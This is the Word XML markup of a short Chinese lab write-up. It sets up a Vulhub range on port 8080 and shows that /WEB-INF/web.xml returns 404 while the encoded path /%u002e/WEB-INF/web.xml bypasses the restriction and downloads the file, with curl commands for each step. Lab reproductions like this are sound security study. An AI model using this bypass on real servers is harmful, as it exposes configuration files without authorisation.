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7F4C3D" w:rsidRDefault="007F4C3D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F4C3D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F4C3D" w:rsidRDefault="007F4C3D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、Vul</w:t>
      </w:r>
      <w:r>
        <w:t>hub启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F4C3D" w:rsidRDefault="007F4C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52357" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="2476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3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C3D" w:rsidRDefault="007F4C3D">
                            <w:r w:rsidRPr="007F4C3D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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="007F4C3D" w:rsidRDefault="007F4C3D">
                      <w:r w:rsidRPr="007F4C3D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4C3D" w:rsidRDefault="007F4C3D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问8</w:t>
      </w:r>
      <w:r>
        <w:t>080，可以看到一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>xample页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F4C3D" w:rsidRDefault="007F4C3D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="372477C2" wp14:editId="291AD6CE">
            <wp:extent cx="52743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3D" w:rsidRDefault="007F4C3D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007F4C3D" w:rsidRPr="007F4C3D" w:rsidRDefault="007F4C3D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F4C3D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F4C3D" w:rsidRDefault="007F4C3D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、直接访问/</w:t>
      </w:r>
      <w:r>
        <w:t>WEB-INF/web.xml会返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>04页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F4C3D" w:rsidRDefault="007F4C3D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5295900" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="1905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C3D" w:rsidRDefault="007F4C3D">
                            <w:r>
                              <w:t>curl –v ‘http://ip:8080/WEB-INF/web.xml’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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="007F4C3D" w:rsidRDefault="007F4C3D">
                      <w:r>
                        <w:t>curl –v ‘http://ip:8080/WEB-INF/web.xml’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4C3D" w:rsidRDefault="007F4C3D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="491C2FA0" wp14:editId="2CD69C79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3D" w:rsidRDefault="007F4C3D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、使用/</w:t>
      </w:r>
      <w:r>
        <w:t>%u002e/WEB-INF/web.xml绕过限制下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>eb.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F4C3D" w:rsidRDefault="007F4C3D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5290457" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="24765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4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C3D" w:rsidRPr="007F4C3D" w:rsidRDefault="007F4C3D">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="007F4C3D">
                              <w:t>curl –v ‘http://ip:8080</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007F4C3D">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t>/</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007F4C3D">
                              <w:t>%u002e/WEB-INF/web.xml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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="007F4C3D" w:rsidRPr="007F4C3D" w:rsidRDefault="007F4C3D">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="007F4C3D">
                        <w:t>curl –v ‘http://ip:8080</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007F4C3D">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007F4C3D">
                        <w:t>%u002e/WEB-INF/web.xml</w:t>
                      </w:r>
                      <w:r>
                        <w:t>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4C3D" w:rsidRDefault="007F4C3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D69E284" wp14:editId="106D7171">
            <wp:extent cx="5274310" cy="1212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4D" w:rsidRDefault="00A55F4D" w:rsidP="007F4C3D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A55F4D" w:rsidRDefault="00A55F4D" w:rsidP="007F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4D" w:rsidRDefault="00A55F4D" w:rsidP="007F4C3D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A55F4D" w:rsidRDefault="00A55F4D" w:rsidP="007F4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E"/>
    <w:rsid w:val="007F4C3D"/>
    <w:rsid w:val="00A55F4D"/>
    <w:rsid w:val="00A9648E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6E80F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C2A7961B-CBDA-421B-A51B-E34DE4B1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2022-05-26T13:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-26T14:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>